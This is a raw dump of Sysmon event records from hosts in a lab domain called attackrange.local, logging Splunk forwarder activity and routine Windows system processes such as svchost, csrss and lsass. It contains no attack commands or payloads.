23542300x80000000000000001045397Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:54.870{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B92B6D298F73E418BEF3E3A91982F109,SHA256=D705921C3300218BDD7F980456D9A2AD9FD8D13233FBB458FCF1AD4745A08C2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805670Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:41:54.423{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB44EE5325C29C34120D2D17ED6363AD,SHA256=269EBA3AAB20842DD2D73251640165DC1DFA37F13F97EE2E449A416D73C34D11,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045396Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:54.720{466BC892-F242-60EB-DB7C-00000000CF01}20085836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001045395Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:54.701{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EA64E7ADBDB8F3354493C958658BEBA6,SHA256=DD7F76C4C3C6866E153822BC59AD377684B1A6130987407FF4B3795F06906C7C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045394Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:54.523{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F242-60EB-DB7C-00000000CF01}2008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045393Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:54.523{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045392Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:54.523{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045391Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:54.523{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045390Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:54.523{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045389Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:54.523{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F242-60EB-DB7C-00000000CF01}2008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045388Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:54.523{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F242-60EB-DB7C-00000000CF01}2008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045387Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:54.518{466BC892-F242-60EB-DB7C-00000000CF01}2008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001045386Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:54.039{466BC892-F241-60EB-DA7C-00000000CF01}92247896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000805669Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:41:53.248{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57125-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001045406Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:55.872{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBD7DD6A01CD1B0EE31A888F5BD78562,SHA256=ED0C815DDA4E7604EDD95B85D90581BD24EB4C12BA713D1C9C1B44AE3DFB57B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805671Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:41:55.455{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=604F0D235A07DC8094F0EF36FD39630D,SHA256=ACF5558ED4735EDFA68B8479C2F7DEBF14BC138865A57D035A27561DB376549A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045405Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:55.357{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F243-60EB-DC7C-00000000CF01}9768C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045404Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:55.357{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045403Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:55.357{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045402Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:55.357{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045401Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:55.342{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045400Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:55.342{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F243-60EB-DC7C-00000000CF01}9768C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045399Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:55.342{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F243-60EB-DC7C-00000000CF01}9768C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045398Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:55.206{466BC892-F243-60EB-DC7C-00000000CF01}9768C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001045410Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:56.887{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D5480AD9B2247E7E18D54D32AB920F9,SHA256=E9E624A0C974AF1198100CD7AA3140960D7E4F0D0C87FB2ACFA0A9D2E59314ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805672Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:41:56.470{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA2DDB08813BC266A60F08E5A04F91EE,SHA256=1F78012ABD64DD6C664F8DCF7FFB8203296BD68237168F3DD87F05EBF7DF03AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045409Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:56.671{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045408Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:47.729{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50870-false10.0.1.12-8000- 23542300x80000000000000001045407Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:56.223{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6E94C19B74B372ACBC19E5A6312E9069,SHA256=7B9F1DA1315BC79A1B21C5E2F6BCF31F3484133290076D93FD2A45753ABD7B2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045411Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:57.902{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FFD19191F72CAAF9A98CE17B0F3B8E2,SHA256=ED69F3222210E20BD41FF0706C78478472C91454C4508860E64459B339C87AC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805673Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:41:57.486{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0564954F3C9C40032E6F52A31AED1277,SHA256=0F79EC94E3C29D0F93E6A675518A24630F2EEB3199612F8971C12CB599B9C319,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805674Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:41:58.517{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=057F8118299D8AA0C88051F03F167BDC,SHA256=5F0948ABF79B2B0833DA52CD1884BF4ACE2B16326BD423F4A0111C0C1E7C4714,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045415Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:58.920{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFAFCFEF821DB42DFEA289202B9B2D32,SHA256=C5EE8A0BA5950F4030C93E329B4CC7BBAC8A672232BF1AE0D07D4D58FBCC0381,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045414Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:58.586{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045413Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:58.586{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045412Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 